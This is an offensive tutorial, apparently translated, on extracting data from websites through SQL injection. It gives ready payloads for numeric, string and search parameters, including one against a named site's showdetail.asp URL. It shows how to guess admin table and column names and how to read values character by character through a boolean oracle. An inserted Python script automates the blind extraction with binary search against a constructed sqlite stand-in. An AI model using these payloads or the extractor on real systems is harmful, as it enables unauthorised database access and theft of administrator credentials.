In the introductory part we learned how to detect SQL injection, but detection alone is not enough to get at a site's confidential data. Next we continue with how to extract the content you want from the database. First, let's look at the general steps of SQL injection:
Section 1. General steps of SQL injection
First, assess the environment, find an injection point and determine the database type; all of this was covered in the introductory part.
Second, reconstruct in your head what the original SQL statement looks like, based on the type of the injected parameter. Parameter types fall mainly into the following three kinds:
(A) ID=49. This kind of injected parameter is numeric, and the original SQL statement looks roughly like this:
    SELECT * FROM tablename WHERE field=49
The injected parameter is ID=49 and [query condition], which generates the statement:
    SELECT * FROM tablename WHERE field=49 and [query condition]
(B) Class=serial. This kind of injected parameter is a string, and the original SQL statement looks roughly like this:
    SELECT * FROM tablename WHERE field='serial'
The injected parameter is Class=serial' and [query condition] and ''=', which generates the statement:
    SELECT * FROM tablename WHERE field='serial' and [query condition] and ''=''
(C) A search whose parameter is not filtered, e.g. keyword=keyword. The original SQL statement looks roughly like this:
    SELECT * FROM tablename WHERE field LIKE '%keyword%'
The injected parameter is keyword=' and [query condition] and '%25'=' (%25 is the URL encoding of %), which generates the statement:
    SELECT * FROM tablename WHERE field LIKE '%' and [query condition] and '%'='%'
Next, substitute a query condition into the SQL statement and guess the table name, for example:
    ID=49 and (select count(*) from admin)>=0
If the page looks the same as for ID=49, the extra condition holds, i.e. the table admin exists; otherwise it does not (keep this method firmly in mind). Loop like this until you have guessed the name.
Once the table name is found, replace count(*) with count(fieldname) and guess the column name in the same way.
Some will say: there is an element of luck here; if the table name is very complicated there is nothing you can do. That is quite true. No hacking technique in the world succeeds 100% of the time, and flies do not land on an uncracked egg: however many techniques a hacker has, they only get in because someone else was careless or not strict, or because the user was not careful about secrecy.
One more remark, getting back to the point: for SQL Server databases there is a way to make the program tell us the table and column names itself; we will introduce it in the advanced part.
Finally, once the table and column names have been guessed, use SQL statements to read the value of the field. The most common method is described below; although it is very slow, it is always feasible.
Take an example: suppose we know the table admin has a field username. First take the first record and test its length:
    http://www.19cn.com/showdetail.asp?id=49 and (select top 1 len(username) from admin)>0
Explanation of the principle first: if the length of the first record's username is greater than 0, the condition holds. Then test >1, >2, >3 ... until the condition fails; for example, if >7 holds and >8 fails, then len(username)=8.
Of course nobody is foolish enough to test 0, 1, 2, 3 one by one; how to do it faster is up to you. Having got the length of username, take the n-th character with mid(username,n,1), then asc(mid(username,n,1)) gives its ASCII code, e.g.:
    ID=49 and (select top 1 asc(mid(username,1,1)) from admin)>0
Again, narrow the range step by step to get the ASCII code of the first character. Note that the ASCII codes of English letters and digits lie between 1 and 128, which can be used to speed up the guessing; if the test is written as a program, the efficiency improves enormously.
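The whole procedure above (guess the table, guess the column, find the length of the first record, then recover it character by character through a boolean "does the page look the same" oracle), automated, as an added example that is not from the original article. It is Python run against an in-memory sqlite3 database standing in for the site's database; that backend is an assumption, since the article targets Access and SQL Server, whose function names are kept in the DIALECT table next to sqlite's (the demo only executes the sqlite variant). The product table with id=49, the admin table and its username value are constructed sample data. The only signal the guessing code receives is whether the concatenated query returned a row without an error, which models "the page looks the same as id=49".

```python
import sqlite3

# Function names differ per engine (see the function table in section 2).
# sqlite is the stand-in backend for this demo only (assumption).
DIALECT = {
    "access":    {"len": "LEN", "mid": "MID", "asc": "ASC",
                  "first": "SELECT TOP 1 {expr} FROM {table}"},
    "sqlserver": {"len": "LEN", "mid": "SUBSTRING", "asc": "UNICODE",
                  "first": "SELECT TOP 1 {expr} FROM {table}"},
    "sqlite":    {"len": "LENGTH", "mid": "SUBSTR", "asc": "UNICODE",
                  "first": "SELECT {expr} FROM {table} LIMIT 1"},
}


class VulnerableApp:
    """Constructed stand-in for showdetail.asp: concatenates the id parameter
    straight into SQL (the bug) and only reveals whether the page rendered."""

    def __init__(self):
        self.db = sqlite3.connect(":memory:")
        self.db.executescript(
            "CREATE TABLE product(id INTEGER, name TEXT);"
            "INSERT INTO product VALUES (49, 'widget');"
            "CREATE TABLE admin(id INTEGER, username TEXT, password TEXT);"
            "INSERT INTO admin VALUES (1, 'admin123', 'S3cret!');"   # constructed
        )
        self.queries = 0   # number of requests the attacker had to send

    def showdetail(self, id_param):
        self.queries += 1
        sql = "SELECT * FROM product WHERE id=" + id_param   # numeric injection point
        try:
            return self.db.execute(sql).fetchone() is not None   # normal page?
        except sqlite3.Error:
            return False   # error page: looks different from id=49


def make_oracle(app, id_value=49):
    """True if 'id=49 and (cond)' renders the same page as plain id=49."""
    return lambda cond: app.showdetail(f"{id_value} AND ({cond})")


def table_exists(oracle, table):
    return oracle(f"(SELECT COUNT(*) FROM {table}) >= 0")


def column_exists(oracle, table, column):
    return oracle(f"(SELECT COUNT({column}) FROM {table}) >= 0")


def bsearch(oracle, expr, lo, hi):
    """Value of expr, assumed in [lo, hi], found by halving the range with
    'expr > n' questions instead of stepping >0, >1, >2 ... one at a time."""
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(f"{expr} > {mid}"):
            lo = mid + 1
        else:
            hi = mid
    return lo


def dump_first_value(oracle, table, column, dialect="sqlite", max_len=64):
    """Recover column's value in the first record: length first, then each
    character's code via asc(mid(column, n, 1)) in the engine's dialect."""
    d = DIALECT[dialect]

    def first(expr):
        return "(" + d["first"].format(expr=expr, table=table) + ")"

    length = bsearch(oracle, first(f"{d['len']}({column})"), 0, max_len)
    chars = []
    for n in range(1, length + 1):
        # 0..255 assumes single-byte characters; widen for Chinese (section 3)
        code = bsearch(oracle, first(f"{d['asc']}({d['mid']}({column},{n},1))"), 0, 255)
        chars.append(chr(code))
    return "".join(chars)


def run_demo():
    app = VulnerableApp()
    oracle = make_oracle(app)
    table = next(t for t in ("user", "admin", "manager") if table_exists(oracle, t))
    column = next(c for c in ("name", "username") if column_exists(oracle, table, c))
    value = dump_first_value(oracle, table, column)
    return table, column, value, app.queries


if __name__ == "__main__":
    print(run_demo())
```

Run it and it reports the guessed table, column, the first username and how many requests that cost. The halving search brings each character down to 8 requests for a 0..255 range, which is the "enormous improvement" the article mentions; the range bound is where Chinese characters differ, since unicode() on SQL Server (or abs(asc()) on Access) returns values up to 65535, as section 3 explains.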
Section 2. Common functions in SQL injection
People with a grounding in SQL have a much higher success rate at SQL injection than those without. We must raise our SQL level, especially where some common functions and commands are concerned.
Access: asc(character)          SQL Server: unicode(character)
Purpose: returns the ASCII code of a character (unicode() returns its Unicode code point)
Access: chr(number)             SQL Server: nchar(number)
Purpose: the reverse of asc(): returns the character for a given code
Access: mid(string, N, L)       SQL Server: substring(string, N, L)
Purpose: returns the substring of length L starting at the N-th character, i.e. the characters from position N through N+L-1
Access: abs(number)             SQL Server: abs(number)
Purpose: returns the absolute value of a number (needed when guessing Chinese characters)
Access: A between B and C       SQL Server: A between B and C
Purpose: tests whether A lies between B and C
Section 3. Handling Chinese characters
Chinese characters are common in injection, and some people are put off as soon as they see them. In fact, as long as you understand Chinese character encoding, "Chinese phobia" is quickly overcome.
First, some basic knowledge:
In Access, the ASCII code of a Chinese character may be negative; after retrieving the negative value, take its absolute value with abs(), and the Chinese character is unchanged.
In SQL Server, the code of a Chinese character is positive, but since it is a double-byte Unicode encoding, the code cannot be obtained with ascii(); you must use unicode() to get the value, and nchar() to return the corresponding Chinese character.
Having understood these two points, don't you think guessing Chinese is actually much the same as guessing English? Apart from the functions used, the main thing is to pay attention to the range; the method itself is no different.